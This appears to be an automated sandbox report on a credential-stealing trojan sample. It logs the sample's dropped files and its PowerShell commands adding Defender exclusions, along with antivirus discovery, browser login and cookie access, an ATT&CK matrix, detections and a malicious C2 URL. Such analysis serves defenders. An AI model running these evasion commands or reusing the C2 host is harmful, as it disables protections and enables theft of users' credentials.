                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 30000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 599853
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598907
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598203
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597344
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597094
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596938
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596766
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596640
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596531
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596422
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596259
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596107
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595954
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595828
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595580
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595014
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594313
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594198
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594078
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593969
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593844
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593735
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593250
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593141
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592985
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592846
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592375
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592157
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592032
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591903
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591578
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591468
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591235
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591110
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeFile opened: C:\Users\user\AppData\Local
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766850936.000000001B9CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: W4tW72sfAD.exe, juptXkyeRvGsIZrQGeVEsrnWhD.exe0.0.drBinary or memory string: EE8hgfsJKrIo2qFkM8q
                          Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2747066121.000000001BE9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: W4tW72sfAD.exe, 00000000.00000002.1775712295.000000001C03B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess token adjusted: Debug
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Users\user\Desktop\W4tW72sfAD.exe VolumeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                          Remote Access Functionality

                          Source: Yara matchFile source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting
                          Valid Accounts241
                          Windows Management Instrumentation
                          1
                          Scripting
                          1
                          DLL Side-Loading
                          11
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          2
                          File and Directory Discovery
                          1
                          Taint Shared Content
                          11
                          Archive Collected Data
                          1
                          Web Service
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading
                          11
                          Process Injection
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory144
                          System Information Discovery
                          Remote Desktop Protocol1
                          Data from Local System
                          1
                          Ingress Tool Transfer
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt21
                          Registry Run Keys / Startup Folder
                          21
                          Registry Run Keys / Startup Folder
                          2
                          Obfuscated Files or Information
                          Security Account Manager341
                          Security Software Discovery
                          SMB/Windows Admin Shares1
                          Clipboard Data
                          11
                          Encrypted Channel
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing
                          NTDS1
                          Process Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets271
                          Virtualization/Sandbox Evasion
                          SSHKeylogging14
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          File Deletion
                          Cached Domain Credentials1
                          Application Window Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items243
                          Masquerading
                          DCSync1
                          Remote System Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                          Virtualization/Sandbox Evasion
                          Proc Filesystem11
                          System Network Configuration Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          [Behavior graph: ID 1428727, Sample: W4tW72sfAD.exe, Start date: 19/04/2024, Architecture: WINDOWS, Score: 100]

                          SourceDetectionScannerLabelLink
                          W4tW72sfAD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          W4tW72sfAD.exe100%AviraHEUR/AGEN.1323342
                          W4tW72sfAD.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat100%AviraBAT/Delbat.C
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\Public\Downloads\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\GNRoGDmH.log100%AviraHEUR/AGEN.1300079
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\EkAnmMVM.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\user\Desktop\BazpdGXT.log100%AviraTR/PSW.Agent.qngqt
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\BuKwfPUT.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Users\Public\Downloads\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\Public\Downloads\RuntimeBroker.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\user\Desktop\BazpdGXT.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\BuKwfPUT.log8%ReversingLabs
                          C:\Users\user\Desktop\DEgxfiAU.log0%ReversingLabs
                          C:\Users\user\Desktop\EkAnmMVM.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\GNRoGDmH.log5%ReversingLabs
                          C:\Users\user\Desktop\HScOGmcH.log3%ReversingLabs
                          C:\Users\user\Desktop\IhtNKAXm.log12%ReversingLabs
                          C:\Users\user\Desktop\JNNDResf.log4%ReversingLabs
                          C:\Users\user\Desktop\LionObPB.log12%ReversingLabs
                          C:\Users\user\Desktop\NEEtYbtY.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\NWsvAoLz.log17%ReversingLabs
                          C:\Users\user\Desktop\QwkEqgro.log4%ReversingLabs
                          C:\Users\user\Desktop\UMwcyUfj.log5%ReversingLabs
                          C:\Users\user\Desktop\VRHDyDUj.log5%ReversingLabs
                          C:\Users\user\Desktop\WoNdSLwd.log8%ReversingLabs
                          C:\Users\user\Desktop\ZpKsdnCB.log5%ReversingLabs
                          C:\Users\user\Desktop\cnkBPSdA.log17%ReversingLabs
                          C:\Users\user\Desktop\eSWSCFMK.log0%ReversingLabs
                          C:\Users\user\Desktop\ekLJkSsv.log12%ReversingLabs
                          C:\Users\user\Desktop\fAbTigaR.log3%ReversingLabs
                          C:\Users\user\Desktop\hSShNgSi.log5%ReversingLabs
                          C:\Users\user\Desktop\kdoiNyxj.log3%ReversingLabs
                          C:\Users\user\Desktop\ndjISZpy.log4%ReversingLabs
                          C:\Users\user\Desktop\nweImycr.log12%ReversingLabs
                          C:\Users\user\Desktop\oQGhqvNX.log8%ReversingLabs
                          C:\Users\user\Desktop\quERYeDq.log17%ReversingLabs
                          C:\Users\user\Desktop\rrfZteSl.log12%ReversingLabs
                          C:\Users\user\Desktop\wHsyCTFf.log12%ReversingLabs
                          C:\Users\user\Desktop\wexYWbhZ.log5%ReversingLabs
                          C:\Users\user\Desktop\yzZxaXSF.log0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                          https://contoso.com/License0%URL Reputationsafe
                          http://crl.mic0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          http://crl.micros0%URL Reputationsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          ipinfo.io
                          34.117.186.192
                          truefalse
                            high
                            api.telegram.org
                            149.154.167.220
                            truefalse
                              high
                              minecrafthyipixel.xyz
                              104.21.57.61
                              truetrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://minecrafthyipixel.xyz/voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.phptrue
                                  unknown
                                  https://ipinfo.io/countryfalse
                                    high
                                    https://ipinfo.io/ipfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabXrKvE5hfPM.49.drfalse
                                        high
                                        http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=XrKvE5hfPM.49.drfalse
                                            high
                                            https://api.telegram.orgW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoXrKvE5hfPM.49.drfalse
